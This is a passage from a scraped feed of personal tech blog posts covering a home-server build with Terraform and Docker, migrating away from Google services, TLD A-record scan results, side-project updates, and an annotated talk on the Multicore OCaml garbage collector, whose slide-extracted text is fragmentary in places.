support the Proxy Protocol,\nboth Traefik and Gitea\u002FSSH servers don’t get informed about the original IP Address. I plan to fix that by switching to HAProxy TCP-mode.\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me\nIf you get lucky with their customer support, some of the folks I know have a static public IP on their home setup. In my case, they asked me to upgrade to a corporate plan. ↩\nI once scanned their entire network using masscan. It was fun: https:\u002F\u002Fmedium.com\u002F@captn3m0\u002Fi-scanned-all-of-act-bangalore-customers-and-the-results-arent-surprising-fecf9d7fe775 ↩\nAWS calls its “permanent” IP addresses “Elastic” and Digital Ocean calls them “Floating”. We really need better names in this industry. ↩\nMigrating to Wireguard is on my list, but I haven’t found any good documentation on running a hub-spoke network so far. ↩",[],{"slug":2557,"title":2495,"link":2558,"pubDate":2559,"contentSnippet":2560,"tags":2561,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"tld-a-records-1","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F02\u002F09\u002Ftld-a-records\u002F","2018-02-09T00:00:00.000Z","Re-ran the same scan as http:\u002F\u002Fblog.towo.eu\u002Fa-records-on-top-level-domains\u002F\nScan run from AS9498.\nResults:\nTLD\n      IP\n    \nai\n      209.59.119.34\n    \nandroid\n      127.0.53.53\n    \narab\n      127.0.53.53\n    \ncal\n      127.0.53.53\n    \nchrome\n      127.0.53.53\n    \ncm\n      195.24.205.60\n    \ndclk\n      127.0.53.53\n    \ndk\n      193.163.102.58\n    \ndrive\n      127.0.53.53\n    \netisalat\n      127.0.53.53\n    \ngg\n      87.117.196.80\n    \ngle\n      127.0.53.53\n    \nguge\n      127.0.53.53\n    \nhangout\n      127.0.53.53\n    \nje\n      87.117.196.80\n    \nnexus\n      127.0.53.53\n    \npa\n      168.77.8.43\n    \nplay\n      127.0.53.53\n    \npn\n      80.68.93.100\n    \npolitie\n      127.0.53.53\n    \nsport\n      127.0.53.53\n    \ntk\n      217.119.57.22\n    \nuz\n      91.212.89.8\n    \nws\n      64.70.19.33\n    \n谷歌\n      127.0.53.53\n    \nмон\n      218.100.84.27\n    \nмон\n      202.170.80.40\n    \nмон\n      180.149.98.78\n    \nاتصالات\n      127.0.53.53\n    \n政府\n      127.0.53.53\n    \nعرب\n      127.0.53.53\n    \n招聘\n      127.0.53.53\n    \nグーグル\n      127.0.53.53\n    \nUpdate: An automatically updated version of this is available at https:\u002F\u002Fcaptnemo.in\u002Ftld-a-record\u002F",[],{"slug":2563,"title":2564,"link":2565,"pubDate":2566,"contentSnippet":2567,"tags":2568,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"migrating-from-google","Migrating from Google (and more)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F12\u002F31\u002Fmigrating-from-google\u002F","2017-12-31T00:00:00.000Z","Contents\nEmail\nGoogle Play Music\nGoogle Keep\nPhone\n      \nmicroG Core\nUnifiedLP\nMaps\nUber\nCalendar\u002FContacts\nGoogle Play Store\nLastPass\nGitHub\nAs part of working on my home-server setup, I wanted to move off few online services to ones that I manage. This is a list of what all services I used and what I’ve migrated to .\nWhy: I got frustrated with Google Play Music a few times. Synced songs would not show up across all clients immediately (I had to refresh,uninstall,reinstall), and I hated the client limits it would impose. Decided to try microG on my phone at the same time, and it slowly came together.\nEmail\nI’ve been using email on my own domain for quite some time (captnemo.in), but it was managed by a Outlook+Google combination that I didn’t like very much.\nI switched to Migadu sometime last year, and have been quite happy with the service. Their Privacy Policy, and pro\u002Fcons section on the website is a pleasure to read.\nWhy: Email is the central-point of your online digital identity. Use your own-domain, at the very least. That way, you’re atleast protected if Google decides to suspend your account. Self-hosting email is a big responsibility that requires critical uptime, and I didn’t want to manage that, so went with migadu.\nWhy Migadu: You should read their HN thread.\nCaviats: They don’t yet offer 2FA, but hopefully that should be fixed soon. Their spam filters aren’t the best either. Migadu even has a Drawbacks section on their website that you must read before signing up.\nAlternatives: RiseUp, FastMail.\nGoogle Play Music\nI quite liked Google Play Music. While their subscription offering is horrible in India, I was a happy user of their “bring-your-own-music” plan. In fact, the most used Google service on my phone happened to be Google Play Music! I switched to a nice subsonic fork called [AirSonic][airsonic], which gives me the ability to:\nListen on as many devices as I want (Google has some limits)\nListen using multiple clients at the same time\nStream at whatever bandwidth I pick (I stream at 64kbps over 2G networks!)\nI’m currently using Clementine on the Desktop (which unfortunately, doesn’t cache music), and UltraSonic on the phone. Airsonic even supports bookmarks, so listening to audiobooks becomes much more simpler.\nWhy: I didn’t like Google Play Music limits, plus I wanted to try the “phone-without-google” experiment.\nWhy AirSonic: Subsonic is now closed source, and the Libresonic developers forked off to AirSonic, which is under active development. It is supports across all devices that I use, while Ampache has spotty Android support.\nGoogle Keep\nI switched across to WorkFlowy, which has both a Android and a Linux app (both based on webviews). I’ve used it for years, and it is a great tool. Moreover, I’m also using DAVDroid sync for Open Tasks app on my phone. Both of these work well enough offline.\nWhy: I didn’t use Keep much, and WorkFlowy is a far better tool anyway.\nWhy WorkFlowy: It is the best note-taking\u002Flist tool I’ve used.\nPhone\nI switched over to the microG fork of lineageOS which offers a reverse-engineered implementation of the Google Play Services modules. It includes:\nmicroG Core\nWhich talks to Google for Sync, Account purposes.\nWhy: Saves me a lot of battery. I can uninstall this, unlike Google Play Services.\nCons: Not all google services are supported very well. Push notifications have some issues on my phone. See the Wiki for Implementation Status.\nUnifiedLP\nInstead of the Google Location Provider. I use the Mozilla Location Services, along with Mozilla Stumbler to help improve their data.\nWhy: Google doesn’t need to know where I am.\nCaviats: GALP (Google Assisted Location Provider) does GPS locks much faster in comparision. However, I’ve found the Mozilla Location Services coverage in Bangalore to be pretty good.\nMaps\nStil looking for decent alternatives.\nUber\nmicroG comes with a Google Maps shim that talks to Open Street Maps. The maps feature on Uber worked fine with that shim, however booking cabs was not always possible. I switched over to m.uber.com which worked quite well for some time.\nUber doesn’t really spend resources on their mobile site though, and it would ocassionaly stop working. Especially with regards to payments. I’ve switched over to the Ola mobile website, which works pretty well. I keep the OlaMoney app for recharging the OlaMoney wallet alongside.\nUber->Ola switch was also partially motivated by how-badly-run Uber is.\nCalendar\u002FContacts\nMost implementations support caldav\u002Fcarddav for calendar\u002Fcontacts sync. I’m using DAVDroid for syncing to a self-hosted Radicale Server.\nWhy: I’ve always had contacts synced to Google, so it was always my-single-source-of-truth for contacts. But since I’m on a different email provider now, it makes sense to move off those contacts as well. Radicale also lets me manage multiple addressbooks very easily.\nWhy Radicale: I looked around at alternatives, and 2 looked promising: Sabre.io, and Radicale. Sabre is no longer under development, so I picked Radicale, which also happened to have a regularly updated docker image.\nGoogle Play Store\nSwitch to FDroid - It has some apps that Google doesn’t like, and some more. Moreover, you can use YALP Store to download any applications from the Play Store. You can even run a FDroid repository for the apps you use from Play Store, as an alternative. See this excellent guide on the various options.\nWhy: Play Store is tightly linked to Google Play Services, and doesn’t play nice with microG.\nWhy FDroid: FDroid has publicly verifiable builds, and tons of open-source applications.\nWhy Yalp: Was easy enough to setup.\nIf you’re looking to migrate to MicroG, I’d recommend going through the entire NO Gapps Setup Guide by shadow53 before proceeding.\nLastPass\nI’ve switched to pass along with a sync to keybase.\nWhy: LastPass has had multiple breaches, and a plethora of security issues (including 2 RCE vulnerabilities). Their fingerprint authentication on Android could be bypassed til recently. I just can’t trust them any more\nWhy pass: It is built on strong crypto primitives, is open-source, and has good integration with both i3 and firefox. There is also a LastPass migration script that I used.\nCaviats: Website names are used as filenames in pass, so even though passwords are encrypted, you don’t want to push it to a public Git server (since that would expose the list of services you are using). I’m using my own git server, along with keybase git(which keeps it end-to-end encrypted, even branch names). You also need to be careful about your GPG keys, instead of a single master password.\nGitHub\nFor bonus, I setup a Gitea server hosted at git.captnemo.in. Gitea is a fork of gogs, and is a single-binary go application that you can run easiy.\nJust running it for fun, since I’m pretty happy with my GitHub setup. However, I might move some of my sensitive repos (such as this) to my own host.\nWhy Gitea: The other alternatives were gogs, and GitLab. There have been concerns about gogs development model, and GitLab was just too overpowered\u002Fheavy for my use case. (I’m using the home server for gaming as well, so it matters)\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2570,"title":2571,"link":2572,"pubDate":2573,"contentSnippet":2574,"tags":2575,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-learnings","Learnings from building my own home server","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F12\u002F18\u002Fhome-server-learnings\u002F","2017-12-18T00:00:00.000Z","Learnings\nI forgot to do this on the last blog post, so here is the list:\narchlinux has official packages for intel-microcode-updates.\nwireguard is almost there. I’m running openvpn for now, waiting for the stable release.\nWhile traefik is great, I’m concerned about the security model it has for connecting to Docker (uses the docker unix socket over a docker mounted volume, which gives it root access on the host). Scary stuff.\nDocker Labels are a great signalling mechanism. Update: After seeing multiple bugs with how traefik uses docker labels, they have limited use-cases but work great in those. Don’t try to over-architect them for all your metadata.\nTerraform still needs a lot of work on their docker provider. A lot of updates destroy containers, which should be applied without needing a destroy.\nI can’t proxy gitea’s SSH authentication easily, since traefik doesn’t support TCP proxying yet.\nThe docker_volume resource in terraform is useless, since it doesn’t give you any control over the volume location on the host. (This might be a docker limitation.)\nThe upload block inside a docker_container resource is a great idea. Lets you push configuration straight inside a container. This is how I push configuration straight inside the traefik container for eg:\n    \n\nupload {\n  content = \"${file(\"${path.module}\u002Fconf\u002Ftraefik.toml\")}\"\n  file    = \"\u002Fetc\u002Ftraefik\u002Ftraefik.toml\"\n}\n\n    \nAdvice\nThis section is if you’re venturing into a docker-heavy terraform setup:\nUse traefik. Will save you a lot of pain with proxying requests.\nRepeat the ports section for every IP you want to listen on. CIDRs don’t work.\nIf you want to run the container on boot, you want the following:\n    \n\n restart = \"unless-stopped\"\n destroy_grace_seconds = 10\n must_run = true\n\n    \nIf you have a single docker_registry_image resource in your state, you can’t run terraform without internet access.\nBreaking your docker module into images.tf, volumes.tf, and data.tf (for registry_images) works quite well.\nMemory limits on docker containers can be too contrained. Keep an eye on logs to see if anything is getting killed.\nSetup Docker TLS auth first. I tried proxying Docker over apache with basic auth, but it didn’t work out well.\nMongoDB with forceful server restarts\nSince my server gets a forceful restart every few days due to power-cuts (I’m still working on a backup power supply), I faced some issues with MongoDB being unable to recover cleanly. The lockfile would indicate a ungraceful shutdown, and it would require manual repairs, which sometimes failed.\nAs a weird-hacky-fix, since most of the errors were from the MongoDB WiredTiger engine itself, I hypothesized that switching to a more robust engine might save me from these manual repairs. I switched to MongoRocks, and while it has stopped the issue with repairs, the wiki stil doesn’t like it, and I’m facing this issue: https:\u002F\u002Fgithub.com\u002FRequarks\u002Fwiki\u002Fissues\u002F313\nHowever, I don’t have to repair the DB manually, which is a win.\nSSHD on specific Interface\nMy proxy server has the following\n\neth0 139.59.22.234\n\n\nAnd an associated Anchor IP for static IP usecases via Digital Ocean. (10.47.0.5, doesn’t show up in ifconfig).\nI wanted to run the following setup:\neth0:22 -> sshd\nAnchor-IP:22 -> simpleproxy -> gitea:ssh\nwhere gitea is the git server hosting git.captnemo.in. This way:\nI could SSH to the proxy server over 22\nAnd directly SSH to the Gitea server over 22 using a different IP address.\nUnfortunately, sshd doesn’t allow you to listen on a specific interface, and since the eth0 IP is non-static I can’t rely on it.\nAs a result, I’ve resorted to just using 2 separate ports:\n22 -> simpleproxy -> gitea:ssh\n222 -> sshd\nThere are some hacky ways around this by creating a new service that boots SSHD after network connectivity, but I thought this was much more stable.\nWiki.js public pages\nI’m using wiki.js setup at https:\u002F\u002Fwiki.bb8.fun. A specific requirement I had was public pages, so that I could give links to people for specific resources that could be browser without a login.\nHowever, I wanted the default to be authenticated, and only certain pages to be public. The config for this was surprisingly simple:\nYAML config\nYou need to ensure that defaultReadAccess is false:\n\nauth:\n  defaultReadAccess: false\n  local:\n    enabled: true\n\n\nGuest Access\nThe following configuration is set for the guest user:\n\nNow any pages created under the \u002Fpublic directory are now browseable by anyone.\nHere is a sample page: https:\u002F\u002Fwiki.bb8.fun\u002Fpublic\u002Fnebula\nDocker CA Cert Authentication\nI wrote a script that goes with the docker TLS guide to help you setup TLS authentication\n\n\nOpenVPN default gateway client side configuration\nI’m running a OpenVPN configuration on my proxy server. Howver, I don’t always want to use my VPN as the default route, only when I’m in an untrusted network. I still however, want to be able to connect to the VPN and use it to connect to other clients.\nThe solution is two-fold:\nServer Side\nMake sure you do not have the following in your OpenVPN server.conf:\npush \"redirect-gateway def1 bypass-dhcp\"\nClient Side\nI created 2 copies of the VPN configuration files. Both of the them have identical config, except for this one line:\nredirect-gateway def1\nIf I connect to the VPN config using this configuration, all my traffic is forwarded over the VPN. If you’re using Arch Linux, this is as simple as creating 2 config files:\n\u002Fetc\u002Fopenvpn\u002Fclient\u002Fone.conf\n\u002Fetc\u002Fopenvpn\u002Fclient\u002Ftwo.conf\nAnd running systemctl start openvpn-client@one. I’ve enabled my non-defaut-route VPN service, so it automatically connects to on boot.\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2577,"title":2578,"link":2579,"pubDate":2580,"contentSnippet":2581,"tags":2582,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-update","Running terraform and docker on my home server","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F11\u002F09\u002Fhome-server-update\u002F","2017-11-09T00:00:00.000Z","The last time I’d posted about my Home Server build in September, I’d just gotten it working. Since then, I’ve made a lot of progress. It is now running almost 10 services, up from just Kodi back then. Now it has a working copy of:\nKodi\n  I was running kodi-standalone-service, set to run on boot, as per the ArchLinux Wiki, but switched in favor of openbox to a simple autorun.\n  Steam\n  The current setup uses Steam as the application launcher. This lets me ensure that the Steam Controller works across all applications.\n  Openbox\n  Instead of running Kodi on xinit, I’m now running openbox with autologin against a non-privileged user.\n  PulseAudio\n  I tried fighting it, but it was slightly easier to configure compared to dmix. Might move to dmix if I get time.\n  btrfs\n  I now have the following disks:\n    \n128GB root volume. (Samsung EVO-850)\n1TB volume for data backups\n3TB RAID0 configuration across 2 disks.\nThere are some btrfs subvolumes in the 3TB raid setup, including one specifically for docker volumes. The docker guide recommends running btrfs subvolumes on the block device, which I didn’t like, so I’m running docker volumes in normal mode on a btrfs disk. I don’t have enough writes to care much yet, but might explore this further.\nDocker\n  This has been an interesting experiment. Kodi is still installed natively, but I’ve been trying to run almost everything else as a docker container. I’ve managed to do the configuration entirely via terraform, which has been a great learning experience. I’ve found terraform much more saner as a configuration system compared to something like ansible, which gets quite crazy. (We have a much more crazy terraform config at work, though).\n  Terraform\n  I have a private repository on GitLab called nebula which I use as the source of truth for the configuration. It doesn’t hold everything yet, just the following:\n    \nDocker Configuration (not the docker service, just the container\u002Fvolumes)\nCloudFlare - I’m using bb8.fun as the root domain, which is entirely managed using the CloudFlare terraform provider.\nMySQL - Running a MariaDB container, which has been configured by-hand till this PR gets merged.\nGitea\n  Running as a docker container, provisioned using terraform. Plan to proxy this using git.captnemo.in.\n  Emby\n  Docker Container. Nothing special. Plan to set this up as the Kodi backend.\n  Couchpotato\n  Experimental setup for now. Inside a docker container.\n  Flexget\n  I wish I knew how to configure this. Also inside docker.\n  traefik\n  Running as a simple reverse proxy for most of the above services\n  elibsrv\n  A simple OPDS server, which I use against my Kindle. If you don’t know what OPDS is, you should [check this out][]. Running on a simple apache setup on the archlinux box for now. WIP for dockerization.\n  ubooquity\n  Simple ebook server. Proxied over the internet. Has a online ebook reader, which is pretty cool.\n  MariaDB\n  I set this up planning to shift Kodi’s data to this, but now that I have emby setup - I’m not so sure. Still, keeping this running for now.\n  Transmission\n  Hooked up to couchpotato,flexget, and sickrage so it can do things.\n  Sickrage\n  Liking this more than flexget so far, much more easier to configure and use.\n  AirSonic\n  This is the latest fork of libresonic, which was itself forked off subsonic. My attempt at getting off Google Play Music.\n\n\nLearnings\nMoved these to a separate blog post\nTODO\nA few things off my TODO list:\nCreate a Docker image for elibsrv that comes with both ebook-convert and kindlegen pre-installed\nDo the same for ubooquity as well (Using the linuxserver\u002Fubooquity docker image)\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2584,"title":2585,"link":2586,"pubDate":2587,"contentSnippet":2588,"tags":2589,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"home-server-build","Home Server Build","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F09\u002F17\u002Fhome-server-build\u002F","2017-09-17T00:00:00.000Z","I’d been planning to run my own home server for a while, and this culminated in a mini-ITX build recently. The current build configuration is available at \u002Fsetup\u002Fhomeserver\u002F.\nIn no particular order, here were the constraints:\nThe case should be small (I preferred the Elite 110, but it was unavailable in India).\nDual LAN, if possible (decided against it at the end). The plan was to run the entire home network from this directly by plugging in the ISP into the server.\nRecent i3\u002Fi5 for amd64 builds.\nEnough SATA bays in the cabinet for storage\nThe plans for the server:\nScheduled backups from other sources (Android\u002FLaptop)\nRun Kodi (or perhaps switch to Emby)\nRun torrents. Transmission-daemon works. Preferably something pluggable and that works with RSS\nDo amd64 builds. See https:\u002F\u002Fgithub.com\u002Fcaptn3m0\u002Fideas#arch-linux-package-build-system\nHost a webserver. This is primarily for serving resources off the internet\n    \nHost some other minor web-services\nA simple wiki\nCaldav server\nOther personal projects\nSync Server setup. Mainly for the Kindle and the phone.\nCalibre-server, koreader sync server for the Kindle\n    \nNow looking at libreread as well\nTiny k8s cluster for running other webapps\nRun a graylog server for sending other system log data (using papertrail now, has a 200MB limit)\nNo plans to move mail hosting. That will stay at migadu.com for now.\nI had a lot of spare HDDs that I was going to re-use for this build:\nWD MyBook 3TB (external, shelled).\nSeagate Expansion: 1TB\nSeagate Expansion 3TB (external, shelled)\nSamsung EVO 128GB SSD\nThe 2x3TB disks are setup with RAID1 over btrsfs. Important data is snapshotted to the other 1TB disk using btrfs snapshots and subvolumes. In total giving me ~4TB of storage.\nSoftware\nCurrently running kodi-standalone-service on boot. Have to decide on a easy-to-use container orchestration platform. Choices as of now are:\nRancher\nDocker Swarm\nShipyard\nTerraform\nPortainer\nMost of these are tuned for multi-host setups, and bring in a lot of complexity as a result. Looking at Portainer, which seems well suited to a single-host setup.\nOther services I’m currently running:\nelibsrv. Running a patched build with support for ebook-convert\nubooquity for online reading of comics\n\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2591,"title":2592,"link":2593,"pubDate":2594,"contentSnippet":2595,"tags":2596,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"project-updates","Project Updates","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F09\u002F16\u002Fproject-updates\u002F","2017-09-16T00:00:00.000Z","Over the last couple of years, I’ve been involved with lots of side projects, both online and offline. Some of them, I’ve written about on the blog, like my music visualizer project. A few of them, got their own project page, like the website for my niece (but no blog post) while some didn’t even get a mention. I thought I’d write about the many-many side projects I’ve started (and abandoned). You might also wanna visit the \u002Fprojects page for the larger projects.\nHome Server Build\n  Sep 2017 Built a home server, mostly as a HTPC but also as a learning exercise for managing services over Docker.\n  Sushi Go\n  Summer 2017 This is a work-in-progress conversion of Sushi Go (original), the popular card game by Gamewright into Ruby.\n  youtube-ripper\n  June 2017 Downloads music-compilations from YouTube and rips them into multiple tagged MP3 files.\n  cosmere-books\n  September 2017 Wrote a EPUB generator for multiple books in the Cosmere. Currently covers 4 different serializations at Tor.com. Also created a project page on all of my ebooks projects at \u002Febooks\u002F\n  ideas\n  Ongoing I maintain a CC0 licensed list of personal ideas. Feel free to use.\n  spectrumyzer\n  May 2017 Created an animated wallpaper using spectrumyzer. Wrote a blog post about it.\n  google-sre\n  Feb\u002FSep 2017 EPUB generator for the Google SRE ebook. Started in February in Python. Gave up and redid it properly in September.\n  CodeChef Offline\n  March 2012 I attempted to make a offline repository for CodeChef problems. I spent some time in May 2017 upgrading the project with a cleaner scraper and a Jekyll base.\n  Hoshruba\n  June 2015 I wrote a script that scraped Tor’s serialized publication of the first book in Hoshruba series to generate EPUB and MOBI files. I would recommend the book if you are interested in reading what many would term the “original fantasy book”\n  HackerTray\n  December 2013 - I wrote a Linux PyGTK application that sits in your taskbar using Indicator Applet to show you the latest stories from Hacker News. Looking for a maintainer.\n  MagicMuggle\n  May 2017 I wrote a script to convert Magic Muggle (A Harry Potter fanfic about a muggle who accidentally gets into Hogwarts) books from their original reddit posts to EPUB and MOBI files.\n  Kerala IT Policy\n  March 2017 Attempted to transcribe the draft IT policies put up by the Government of Kerala. Lots of OCR followed by manual fixes. I stopped working on this when I realized that the government had actually put up a really nice website for this (with clear plaintext, not the bad PDF I was using as the source).\n  lightsaber\n  August 2015 I created a DNS based HTTP-3xx redirect service. Useful if you own a domain and you want it to be redirected, but don’t have a webserver with you. Made as part of the Django Hackathon organized by HackerEarth in Ruby.\n  HackerCouch\n  November 2015 My hack during hackbeach 2015. Created something best described as “couchsurfing for hackers”. Simple Jekyll\u002FRuby website hosted on GitHub Pages.",[],{"slug":2598,"title":2599,"link":2600,"pubDate":2601,"contentSnippet":2602,"tags":2603,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"multicore-ocaml-gc","A deep dive into Multicore OCaml garbage collector","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fgc\u002F2017\u002F07\u002F06\u002Fmulticore-ocaml-gc\u002F","2017-07-06T01:36:00.000Z",".annotslide{display:none}\n\n\nI recently gave a talk on the internals of multicore OCaml GC at Jane Street\noffices in NYC. The slides from the talk are available\nonline. But I felt that\nthe slides alone aren’t particularly edifying. This post is basically the slides\nfrom the talk annotated with notes.\nAbstract\nIn a mostly functional language like OCaml, it is desirable to have each domain\n(our unit of parallelism) collect its own local garbage independently. Given\nthat OCaml is commonly used for writing latency sensitive code such as trading\nsystems, UIs, networked unikernels, it is also desirable to minimise the\nstop-the-world phases in the GC. Although obvious, the difficulty is to make\nthis work in the presence of mutations and concurrency. In this talk, I will\npresent the overall design of Multicore OCaml GC, but also deep dive into a few\nof the interesting techniques that make it work.\nSlidedeck\n of \n  \n  ❮ Prev\n  Next ❯\n  ( ← and → arrow keys also work)\n\n\n\n\n  \n  \nMulticore OCaml project is led from OCaml Labs within the University of\nCambridge. Stephen Dolan begun the project\nwhile procrastinating on writing up his dissertation. Hurray to that! \n\n\n \n  \nfibers. The unit of\nparallelism is a domain, which maps to kernel threads. Many kernel\nthreads may service a particular domain, but only one of those kernel threads\never runs OCaml code. A typical program is expected to have a large number of\nfibers mapped over a few domains. In this talk, I provide an overview of the\nMulticore OCaml GC design, with a few deep dives into some of the interesting\nand novel techniques.\n\n\n\n  \n  \nroots of the program state i.e., current stack and registers, and\nperform a depth-first traversal through the object graph. Any unreachable\nobjects are garbage and they can be reclaimed. \n\nTri-colour marking is a standard marking algorithm. During marking, the objects\nare in one of three states: white(unmarked), grey(marking) and black(marked). \n\n\n\n  \nmark stack. Subsequently, objects are\npopped off the mark stack, all of its white children marked, and the object is\nmarked black. We have the invariant that a black object does not point to a\nwhite object. This is called the tri-colour invariant. The figure shows the\nstate when object A and its children have been marked (hence, A is black),\nobject B has been marked grey and is on the mark stack.\n\n\n\n  \nall the\nallocated objects, and marks any object still white as free space that can\nsubsequently be reused. \n\n\n\n  \n  \n  \ncopying collector, and any object that survives the\nminor GC is promoted to the major GC. A nice aspect of copying collection for\nminor GC is that only the live objects need to be scanned, unlike mark and sweep\ncollection where the sweeper needs to examine every allocated object. Given the\ngenerational hypothesis, we will not examine most of the objects in the minor\nheap. As a data point, the minor GC survival rate while compiling the OCaml\ncompiler is around 10%.\n\n\n\n  \n  \n  \n  \nwrite barrier that records such\npointers in an auxiliary data structure called the remembered set. \n\n\n\n  \n  \n  \nB to the\nblack object C...\n\n\n\n  \nA to B.\nIf we perform a major GC now, \n\n\n\n  \nA will be eventually marked as black. But\nthe white object B is only pointed to by\nthe black object C, which will not be\nmarked, \n\n\n\n  \n  \n  \n  \nB from being GCed. The insertion barrier is said to preserve\nstrong tri-colour invariant: A black object never points to a white\nobject. \n\n\n\n  \nC to B. \n\n\n\n  \nA to\nthe white B is deleted, B is marked. This prevents B from being GCed. The deletion barrier\npreserves weak tri-colour invariant: for any white object pointed to by\nblack object, there exists some grey object from which through a series of white\nobjects that white object is reachable.\n\n\n\n  \nr if\nboth r and x are in the major heap. \n\n\n\n  \nDomain.spawn forks off a\nnew domain to run the thunk in parallel with the calling domain. It is\nreasonable to expect that most of the objects in the minor heap are in fact local\nto the domain which allocated the object, and are never shared between domains.\nHence, it is desirable to collect each domain's young garbage independently\nwithout having to synchronize all of the domains. \n\n\n\n  \n  \nPOPL'93\npaper, Doligez and Leroy built a concurrent garbage collector for concurrent\ncaml light which used domain local heaps. In their paper, the heap invariants\nimposed are that there are no pointers between the local heaps and the major\nheap does not point to any minor heaps. \n\n\n\n  \n  \n  \n  \nMarlow\nand Peyton Jones evaluated a local heap design with similar weaker heap\ninvariants for GHC Haskell.\n\n\n\n  \n  \n0xPQRS. In OCaml, integer values are\nrepresented by tagging the least significant bit to be 1. Hence, in this\nexample, integers have low bit of S to be\n1. Minor heap values have PQ to be 42, and R \ndetermines the domain. \n\nWe can implement the read barrier check by comparing the given address with an\naddress from the minor heap. Luckily, we have such an address handily available\nin the register -- the allocation pointer. On amd64, the allocation\npointer is in register r15.\n\n\n\n  \nrax register. At\nthe end of this sequence of instructions, if none of the enabled bits in 0xff01 are set in rax, then zero flag will be set, and we know\nthat the value is not a pointer into a foreign minor heap. Let's see how this\nworks for the different cases.\n\n\n\n  \n  \nPQ bits will different between r15 and rax. Hence, zero flag will not be set.\n\n\n\n  \nPQR will be the same. Hence, the subtraction\nunderflows and sets all the bits in PQ.\nHence, the zero flag will not be set.\n\n\n\n  \n \nIn the case of an address in foreign minor heap, the bits PQ will be the same. The bits in R will be different, and S will be zero in both values. After xoring,\nR will be non-zero and importantly, the\nrest of the bits are zero. Subtracting 1 from a non-zero value does not\nunderflow, hence the rest of the bits remain zero. Now, the zero flag will be\nset after the test, and we know that the pointer is in the foreign minor heap.\n\n\n\n  \nAbstract_tag where a C library may map a C\nstructure onto the OCaml heap and modify it transparently without the knowledge\nof the write barrier. Hence, the copies may go out of sync.\n\n\n\nWe may instead move the object to the major heap and perform a minor GC to fix\nany references to the promoted objects. However, this scheme suffers from false\npromotions and long pauses during reads. To avoid false promotions, we may\npromote the object and scan the roots and the entire minor heap to fix any\nreferences to promoted objects. However, one needs to scan all the objects in\nthe minor heap, which even the minor collection doesn't have to do.\n\n\n\n\n  \n  \npromotion_set, which\nis only scanned during the promotion process. Otherwise, we move the object\nclosure and perform a minor GC.\n\n\n\n  \n  \nVery\nConcurrent Mark-&-Sweep Garbage Collector (VCGC) design from the Inferno\nproject which allows the mutator, marker and the sweeper threads to run\nconcurrently. In VCGC design, there is a small stop-the-world phase at the end\nof a cycle where the threads agree on the end of the current major GC cycle and\nthe beginning of the next one. Multicore OCaml's major GC is mostly concurrent\nmark and sweep where the stop-the-world phase might need to do a small fraction\nof major GC work left over before the end of the cycle, not unlike the VCGC\ndesign with many mutators i.e., parallel execution.\n\n\n\n  \nMarked, Unmarked, Garbage and Free. The domains alternate between running the\nmutator and performing GC work. The GC thread performs a depth-first traversal\nof the heap. If it finds an Unmarked\nobject, it changes its colour to Marked\nand pushes the object into a domain-local mark-stack. On the other hand, if it\nfinds a Garbage object, it marks it as\nFree and adds it to the free list. Since\nmultiple GC threads operate on the heap simultaneously, marking is racy but\nidempotent. In particular, there is no synchronization for marking the objects.\n\n\n\n  \nUnmarked is considered Garbage. Anything that is Marked becomes Unmarked for the next cycle. Garbage objects are considered Marked, but at the end of the major GC, all\nGarbage objects have been marked Free. Hence, no objects fall into this\ncategory. Anything that is marked Free\nstill remains Free. This concludes the\ndiscussion on parallelism.\n\n\n\n  \n  \nremembered fiber set. \n\n\n\n  \n  \nx to\nr, instead of promoting fiber f, \n\n\n\n  \nx in the remembered set.\n\n\n\n  \nf,  \n\n\n\n  \n  \n  \n  \n  \n  \nBlack. And in order to prevent racy\naccess, the fiber is locked while marking. If the GC thread holds the lock on a\nfiber and a mutator tries to context switch to it, the mutator blocks until the\nfiber is marked. If the GC thread loses the race, it can safely skip marking the\nfiber.\n\n\n\n  \n x.length) {slideIndex = 1}    \n  if (n \n\nFurther Reading\nMulticore OCaml\n    \nConcurrency\n        \nEffective Concurrency with Algebraic Effects\nPearls of 